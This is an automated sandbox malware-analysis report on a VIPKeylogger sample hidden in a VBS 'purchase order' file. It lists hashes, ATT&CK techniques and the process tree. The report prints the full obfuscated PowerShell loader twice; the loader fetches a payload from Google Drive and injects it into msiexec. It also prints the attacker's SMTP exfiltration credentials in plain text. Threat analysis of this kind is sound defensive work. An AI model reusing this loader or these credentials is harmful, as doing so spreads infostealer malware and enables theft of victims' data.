vipkeylogger | a2ef6e1f58a00b5d6523987df95a7ffc052a89470f97cd228a14fbccff113237

General

Target

DistribucionesEnelcaJanS.L.PEDIDO456799.vbs
Size

529KB
MD5

3f13eef87515d70fbdfedc6de7b6efc4
SHA1

8d2394c2e4daada6b8d9af1b60d8d11130ac1845
SHA256

a2ef6e1f58a00b5d6523987df95a7ffc052a89470f97cd228a14fbccff113237
SHA512

585541e886e8175def7f0e4d92c2ad39c065f8777a113c8738a2aaade3dc96592572265f1e3511718dcdd0703730d530fa13b88c4773ecd2a2ef181c5886de7a
SSDEEP

6144:o0/75XG/Kk33JliXA0PsaaBBWiQP88BNkmxylnwa4j3Ms/+UrJ/WzukhWwP+m55k:BNU3/G6PQU8/xCnv4Y4lWzCwPHtvP9Dg

Score

10^/10

vipkeylogger discovery execution keylogger stealer

Malware Config

Extracted

Family

vipkeylogger

Credentials

Protocol: smtp
Host:
mail.daniberto.com
Port:
587
Username:
[email protected]
Password:
Fabrica1221.
Email To:
[email protected]

Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger

Blocklisted process makes network request 10 IoCs

flow	pid	Process
5	2700	powershell.exe
7	2700	powershell.exe
9	2276	msiexec.exe
11	2276	msiexec.exe
13	2276	msiexec.exe
15	2276	msiexec.exe
16	2276	msiexec.exe
18	2276	msiexec.exe
20	2276	msiexec.exe
22	2276	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2700	powershell.exe
2072	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	checkip.dyndns.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2276	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2072	powershell.exe
2276	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2700	powershell.exe
2072	powershell.exe
2072	powershell.exe
2276	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2072	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeDebugPrivilege	2072	powershell.exe
Token: SeDebugPrivilege	2276	msiexec.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 1900 wrote to memory of 2700	1900	WScript.exe	30
PID 1900 wrote to memory of 2700	1900	WScript.exe	30
PID 1900 wrote to memory of 2700	1900	WScript.exe	30
PID 2072 wrote to memory of 2276	2072	powershell.exe	35
PID 2072 wrote to memory of 2276	2072	powershell.exe	35
PID 2072 wrote to memory of 2276	2072	powershell.exe	35
PID 2072 wrote to memory of 2276	2072	powershell.exe	35
PID 2072 wrote to memory of 2276	2072	powershell.exe	35
PID 2072 wrote to memory of 2276	2072	powershell.exe	35
PID 2072 wrote to memory of 2276	2072	powershell.exe	35
PID 2072 wrote to memory of 2276	2072	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DistribucionesEnelcaJanS.L.PEDIDO456799.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1900
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') ;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2700

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') ;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2072
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2276

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Bindehindens.Stu

Filesize
464KB

MD5
d43327229caac3f1c1c7443675eaa345

SHA1
169d456a6122e6a39603f3017eb16df162aca251

SHA256
0144e44b033690c4d3387d5125a5a76003d371ca48116a53d1439f83d6b530d3

SHA512
da4cdb914c5618ca83f4f97bf28d89899bc9459ff797b6f865488a7f446b56cea77bbe37aeb2e89fb81937b6fa1929a2e6c9feca5fa2ee32344f21e0dff3a10d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FVLL3ESHKXJFXX1D8EA1.temp

Filesize
7KB

MD5
2d065c66d5e9293f616b97f6f99d65a1

SHA1
5e4ad8f229ce0742ec6cba772aacc4d34aab5f9c

SHA256
391782ac7dc0a2347fbe4a0c0c123a2a5763e44d8155125b46e4c59c56c9a68d

SHA512
d96f7e1449e6d7ddb1877d36b1ea60f8a38153798728f7ca2c00e476fb95e4c0a73dda342a0e1cc793ff61f52ab0aea02bcba4d00ac0968e7bc238a4ab7e92f3

Download Submit
memory/2072-19-0x0000000006750000-0x000000000BA5E000-memory.dmp

Filesize
83.1MB

Download
memory/2276-43-0x0000000000F30000-0x0000000000F78000-memory.dmp

Filesize
288KB

Download
memory/2276-42-0x0000000000F30000-0x0000000001F92000-memory.dmp

Filesize
16.4MB

Download
memory/2276-41-0x0000000000F30000-0x0000000001F92000-memory.dmp

Filesize
16.4MB

Download
memory/2700-8-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

Filesize
32KB

Download
memory/2700-11-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

Filesize
9.6MB

Download
memory/2700-13-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

Filesize
9.6MB

Download
memory/2700-15-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

Filesize
9.6MB

Download
memory/2700-10-0x000007FEF60CE000-0x000007FEF60CF000-memory.dmp

Filesize
4KB

Download
memory/2700-9-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

Filesize
9.6MB

Download
memory/2700-4-0x000007FEF60CE000-0x000007FEF60CF000-memory.dmp

Filesize
4KB

Download
memory/2700-7-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

Filesize
9.6MB

Download
memory/2700-6-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

Filesize
2.9MB

Download
memory/2700-5-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing